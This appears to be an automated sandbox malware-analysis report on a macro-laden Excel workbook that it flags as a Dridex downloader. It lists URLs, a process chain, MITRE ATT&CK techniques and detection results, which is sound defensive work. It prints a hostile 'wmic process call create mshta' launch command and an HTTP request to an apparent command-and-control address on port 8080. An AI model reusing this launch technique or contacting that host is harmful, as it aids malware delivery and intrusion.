      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://wus2.contentsync.
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 132.148.135.183:8080Connection: Keep-Alive

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\xkNURUQaCiKQrGY.rtf, type: DROPPED

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: subscription-673890410.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: subscription-673890410.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 0000000B.00000002.408715007.00000000009F0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default(
      Found obfuscated Excel 4.0 MacroShow sources
      Source: subscription-673890410.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 55
      Source: subscription-673890410.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: subscription-673890410.xlsbVirustotal: Detection: 8%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf"Jump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$subscription-673890410.xlsbJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{A8E643AE-57A0-4E57-B666-ADC2C74E4167} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal92.troj.expl.evad.winXLSB@5/9@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: subscription-673890410.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: subscription-673890410.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: subscription-673890410.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: 6076E6FB.tmp.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: 6076E6FB.tmp.0.drInitial sample: OLE zip file path = xl/media/image2.png
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: xknuruqacikqrgy.rtfJump to behavior
      Source: unknownProcess created: cmd line: xknuruqacikqrgy.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 0000000D.00000002.564623251.000001E40F310000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: mshta.exe, 0000000D.00000002.564623251.000001E40F310000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 0000000D.00000002.564623251.000001E40F310000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: mshta.exe, 0000000D.00000002.564623251.000001E40F310000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingProcess Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection2LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution32Logon Script (Windows)Logon Script (Windows)Scripting3Security Account ManagerSystem Information Discovery14SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      subscription-673890410.xlsb8%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://roaming.edog.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://api.aadrm.com0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%VirustotalBrowse
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%Avira URL Cloudsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDGfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
        high
        https://login.microsoftonline.com/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
          high
          https://shell.suite.office.com:144392CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
              high
              https://autodiscover-s.outlook.com/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                high
                https://roaming.edog.92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                • URL Reputation: safe
                unknown
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                  high
                  https://cdn.entity.92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/query92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                        high
                        https://powerlift.acompli.net92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v192CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                          high
                          https://cortana.ai92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspx92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                    high
                                    https://api.aadrm.com/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                          high
                                          https://cr.office.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                            high
                                            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://portal.office.com/account/?ref=ClientMeControl92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                              high
                                              https://graph.ppe.windows.net92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://api.aadrm.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                          high
                                                          https://dev0-api.acompli.net/autodetect92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplate92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.net92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                        high
                                                                                        https://outlook.office365.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/ios92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.net92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                              high
                                                                                                              https://substrate.office.com/search/api/v2/init92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocation92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                          high
                                                                                                                          https://substrate.office.com/search/api/v1/SearchHistory92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorize92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/imports92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                      • URL Reputation: safe
